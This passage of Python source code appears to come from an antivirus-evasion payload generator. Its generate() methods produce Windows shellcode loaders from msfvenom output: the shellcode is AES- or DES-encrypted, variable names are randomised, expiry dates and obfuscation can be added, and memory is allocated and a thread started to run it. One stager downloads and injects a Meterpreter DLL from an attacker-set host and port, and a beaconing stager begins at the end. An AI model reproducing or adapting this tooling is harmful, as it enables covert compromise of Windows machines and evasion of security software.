PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + RandPadding + ' = \'{\'\n'
PayloadCode += '\t' + RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
PayloadCode += '\t' + RandCipherObject + ' = AES.new(\'' + secret + '\')\n'
PayloadCode += '\t' + RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
PayloadCode += '\t' + ShellcodeVariableName + ' = ' + RandDecodedShellcode + '.decode("string_escape")\n'
PayloadCode += '\t' + RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
PayloadCode += '\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
PayloadCode += '\t' + RandShellcode + '()'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
def generate(self):
if self.required_options["inject_method"][0].lower() == "virtual":
if self.required_options["expire_payload"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
# Create Payload code
PayloadCode = 'import ctypes\n'
PayloadCode += ShellcodeVariableName + ' = bytearray(\'' + Shellcode + '\')\n'
PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(
days=int(self.required_options["expire_payload"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
# Create Payload code
PayloadCode = 'import ctypes\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[
2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + ShellcodeVariableName + ' = bytearray(\'' + Shellcode + '\')\n'
PayloadCode += '\t' + RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
PayloadCode += '\t' + RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += '\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += '\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
if self.required_options["inject_method"][0].lower() == "heap":
if self.required_options["expire_payload"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
HeapVar = helpers.randomString()
# Create Payload code
PayloadCode = 'import ctypes\n'
PayloadCode += ShellcodeVariableName + ' = bytearray(\'' + Shellcode + '\')\n'
PayloadCode += HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + ShellcodeVariableName + ') * 2),ctypes.c_int(0))\n'
PayloadCode += RandPtr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + ShellcodeVariableName + ')))\n'
PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(
days=int(self.required_options["expire_payload"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
HeapVar = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
# Create Payload code
PayloadCode = 'import ctypes\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[
2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + ShellcodeVariableName + ' = bytearray(\'' + Shellcode + '\')\n'
PayloadCode += '\t' + HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + ShellcodeVariableName + ') * 2),ctypes.c_int(0))\n'
PayloadCode += '\t' + RandPtr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += '\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += '\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
if self.required_options["expire_payload"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
RandShellcode = helpers.randomString()
RandReverseShell = helpers.randomString()
RandMemoryShell = helpers.randomString()
PayloadCode = 'from ctypes import *\n'
PayloadCode += RandReverseShell + ' = \"' + Shellcode + '\"\n'
PayloadCode += RandMemoryShell + ' = create_string_buffer(' + RandReverseShell + ', len(' + RandReverseShell + '))\n'
PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
PayloadCode += RandShellcode + '()'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(
days=int(self.required_options["expire_payload"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
RandShellcode = helpers.randomString()
RandReverseShell = helpers.randomString()
RandMemoryShell = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
PayloadCode = 'from ctypes import *\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[
2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + RandReverseShell + ' = \"' + Shellcode + '\"\n'
PayloadCode += '\t' + RandMemoryShell + ' = create_string_buffer(' + RandReverseShell + ', len(' + RandReverseShell + '))\n'
PayloadCode += '\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
PayloadCode += '\t' + RandShellcode + '()'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
def generate(self):
payloadCode = "import urllib2, string, random, struct, ctypes, httplib, time\n"
# randomize everything, yo'
sumMethodName = helpers.randomString()
checkinMethodName = helpers.randomString()
randLettersName = helpers.randomString()
randLetterSubName = helpers.randomString()
randBaseName = helpers.randomString()
downloadMethodName = helpers.randomString()
hostName = helpers.randomString()
portName = helpers.randomString()
requestName = helpers.randomString()
tName = helpers.randomString()
injectMethodName = helpers.randomString()
dataName = helpers.randomString()
byteArrayName = helpers.randomString()
ptrName = helpers.randomString()
bufName = helpers.randomString()
handleName = helpers.randomString()
data2Name = helpers.randomString()
proxy_var = helpers.randomString()
opener_var = helpers.randomString()
# helper method that returns the sum of all ord values in a string % 0x100
payloadCode += "def %s(s): return sum([ord(ch) for ch in s]) %% 0x100\n" % (
sumMethodName)
# method that generates a new checksum value for checkin to the meterpreter handler
payloadCode += "def %s():\n\tfor x in xrange(64):\n" % (
checkinMethodName)
payloadCode += "\t\t%s = ''.join(random.sample(string.ascii_letters + string.digits,3))\n" % (
randBaseName)
payloadCode += "\t\t%s = ''.join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random()))\n" % (
randLettersName)
payloadCode += "\t\tfor %s in %s:\n" % (randLetterSubName,
randLettersName)
payloadCode += "\t\t\tif %s(%s + %s) == 92: return %s + %s\n" % (
sumMethodName, randBaseName, randLetterSubName, randBaseName,
randLetterSubName)
# method that connects to a host/port over https and downloads the hosted data
payloadCode += "def %s(%s,%s):\n" % (downloadMethodName, hostName,
portName)
payloadCode += "\t" + proxy_var + " = urllib2.ProxyHandler()\n"
payloadCode += "\t" + opener_var + " = urllib2.build_opener(" + proxy_var + ")\n"
payloadCode += "\turllib2.install_opener(" + opener_var + ")\n"
payloadCode += "\t%s = urllib2.Request(\"https://%%s:%%s/%%s\" %%(%s,%s,%s()), None, {'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'})\n" % (
requestName, hostName, portName, checkinMethodName)
payloadCode += "\ttry:\n"
payloadCode += "\t\t%s = urllib2.urlopen(%s)\n" % (tName, requestName)
payloadCode += "\t\ttry:\n"
payloadCode += "\t\t\tif int(%s.info()[\"Content-Length\"]) > 100000: return %s.read()\n" % (
tName, tName)
payloadCode += "\t\t\telse: return ''\n"
payloadCode += "\t\texcept: return %s.read()\n" % (tName)
payloadCode += "\texcept urllib2.URLError, e: return ''\n"
# method to inject a reflective .dll into memory
payloadCode += "def %s(%s):\n" % (injectMethodName, dataName)
payloadCode += "\tif %s != \"\":\n" % (dataName)
payloadCode += "\t\t%s = bytearray(%s)\n" % (byteArrayName, dataName)
payloadCode += "\t\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)), ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" % (
ptrName, byteArrayName)
payloadCode += "\t\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)\n" % (
bufName, byteArrayName, byteArrayName)
payloadCode += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s),%s, ctypes.c_int(len(%s)))\n" % (
ptrName, bufName, byteArrayName)
payloadCode += "\t\t%s = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" % (
handleName, ptrName)
payloadCode += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(%s),ctypes.c_int(-1))\n" % (
handleName)
# download the metpreter .dll and inject it
payloadCode += "%s = ''\n" % (data2Name)
payloadCode += "%s = %s(\"%s\", %s)\n" % (
data2Name, downloadMethodName, self.required_options["LHOST"][0],
self.required_options["LPORT"][0])
payloadCode += "%s(%s)\n" % (injectMethodName, data2Name)
if self.required_options["use_pyherion"][0].lower() == "y":
payloadCode = encryption.pyherion(payloadCode)
return payloadCode
def generate(self):
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandDESKey = helpers.randomString()
RandDESPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
# encrypt the shellcode and get our randomized key/iv
(EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)
# Create Payload File
PayloadCode = 'from Crypto.Cipher import DES\n'
PayloadCode += 'import ctypes as avlol\n'
PayloadCode += RandIV + ' = \'' + iv + '\'\n'
PayloadCode += RandDESKey + ' = \'' + DESKey + '\'\n'
PayloadCode += RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
PayloadCode += RandPtr + ' = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len('+ ShellcodeVariableName +')),avlol.c_int(0x3000),avlol.c_int(0x40))\n'
PayloadCode += RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += 'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
PayloadCode += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandDESKey = helpers.randomString()
RandDESPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
# encrypt the shellcode and get our randomized key/iv
(EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)
# Create Payload File
PayloadCode = 'from Crypto.Cipher import DES\n'
PayloadCode += 'import ctypes as avlol\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + RandIV + ' = \'' + iv + '\'\n'
PayloadCode += '\t' + RandDESKey + ' = \'' + DESKey + '\'\n'
PayloadCode += '\t' + RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
PayloadCode += '\t' + RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
PayloadCode += '\t' + ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
PayloadCode += '\t' + RandPtr + ' = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len('+ ShellcodeVariableName +')),avlol.c_int(0x3000),avlol.c_int(0x40))\n'
PayloadCode += '\t' + RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += '\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
PayloadCode += '\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
if self.required_options["INJECT_METHOD"][0].lower() == "heap":
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandDESKey = helpers.randomString()
RandDESPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
HeapVar = helpers.randomString()
# encrypt the shellcode and get our randomized key/iv
(EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)
# Create Payload File
PayloadCode = 'from Crypto.Cipher import DES\n'
PayloadCode += 'import ctypes as avlol\n'
PayloadCode += RandIV + ' = \'' + iv + '\'\n'
PayloadCode += RandDESKey + ' = \'' + DESKey + '\'\n'
PayloadCode += RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
PayloadCode += HeapVar + ' = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len(' + ShellcodeVariableName + ') * 2),avlol.c_int(0))\n'
PayloadCode += RandPtr + ' = avlol.windll.kernel32.HeapAlloc(avlol.c_int(' + HeapVar + '),avlol.c_int(0x00000008),avlol.c_int(len( ' + ShellcodeVariableName + ')))\n'
PayloadCode += RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += 'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
PayloadCode += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandDESKey = helpers.randomString()
RandDESPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
HeapVar = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
# encrypt the shellcode and get our randomized key/iv
(EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)
# Create Payload File
PayloadCode = 'from Crypto.Cipher import DES\n'
PayloadCode += 'import ctypes as avlol\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + RandIV + ' = \'' + iv + '\'\n'
PayloadCode += '\t' + RandDESKey + ' = \'' + DESKey + '\'\n'
PayloadCode += '\t' + RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
PayloadCode += '\t' + RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
PayloadCode += '\t' + ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
PayloadCode += '\t' + HeapVar + ' = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len(' + ShellcodeVariableName + ') * 2),avlol.c_int(0))\n'
PayloadCode += '\t' + RandPtr + ' = avlol.windll.kernel32.HeapAlloc(avlol.c_int(' + HeapVar + '),avlol.c_int(0x00000008),avlol.c_int(len( ' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += '\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
PayloadCode += '\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandDESKey = helpers.randomString()
RandDESPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
RandShellcode = helpers.randomString()
RandReverseShell = helpers.randomString()
RandMemoryShell = helpers.randomString()
# encrypt the shellcode and get our randomized key/iv
(EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)
# Create Payload File
PayloadCode = 'from Crypto.Cipher import DES\n'
PayloadCode += 'from ctypes import *\n'
PayloadCode += RandIV + ' = \'' + iv + '\'\n'
PayloadCode += RandDESKey + ' = \'' + DESKey + '\'\n'
PayloadCode += RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
PayloadCode += ShellcodeVariableName + ' = ' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n'
PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
PayloadCode += RandShellcode + '()'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandDESKey = helpers.randomString()
RandDESPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
RandShellcode = helpers.randomString()
RandReverseShell = helpers.randomString()
RandMemoryShell = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
# encrypt the shellcode and get our randomized key/iv
(EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)
# Create Payload File
PayloadCode = 'from Crypto.Cipher import DES\n'
PayloadCode += 'from ctypes import *\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + RandIV + ' = \'' + iv + '\'\n'
PayloadCode += '\t' + RandDESKey + ' = \'' + DESKey + '\'\n'
PayloadCode += '\t' + RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
PayloadCode += '\t' + RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
PayloadCode += '\t' + ShellcodeVariableName + ' = ' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n'
PayloadCode += '\t' + RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
PayloadCode += '\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
PayloadCode += '\t' + RandShellcode + '()'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
def generate(self):
imports = "import sys; import urllib2; import ctypes; import time; import signal; import threading\n"
inject_func = helpers.randomString()
getexec_func = helpers.randomString()
main_func = helpers.randomString()
beaconthr_func = helpers.randomString()
retry_var = helpers.randomString()
if self.required_options["BEACON"][0].lower() == 'n':
global_vars = "%s = False" % retry_var
elif self.required_options["BEACON"][0].lower() == 'y':
global_vars = "%s = True" % retry_var
interval_var = helpers.randomString()
opener_var = helpers.randomString()
global_vars += "\n%s = %s" % (
interval_var, self.required_options["BEACON_SECONDS"][0])
global_vars += "\n%s = urllib2.build_opener()\n" % (opener_var)
shellcode_var = helpers.randomString()
ptr_var = helpers.randomString()
ht_var = helpers.randomString()
buff_var = helpers.randomString()
inject = "def %s(%s):" % (inject_func, shellcode_var)
inject += "\n\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)),ctypes.c_int(0x3000),ctypes.c_int(0x40))" % (
ptr_var, shellcode_var)
inject += "\n\tctypes.windll.kernel32.VirtualLock(ctypes.c_int(%s), ctypes.c_int(len(%s)))" % (
ptr_var, shellcode_var)
inject += "\n\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)" % (
buff_var, shellcode_var, shellcode_var)
inject += "\n\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s), %s, ctypes.c_int(len(%s)))" % (
ptr_var, buff_var, shellcode_var)
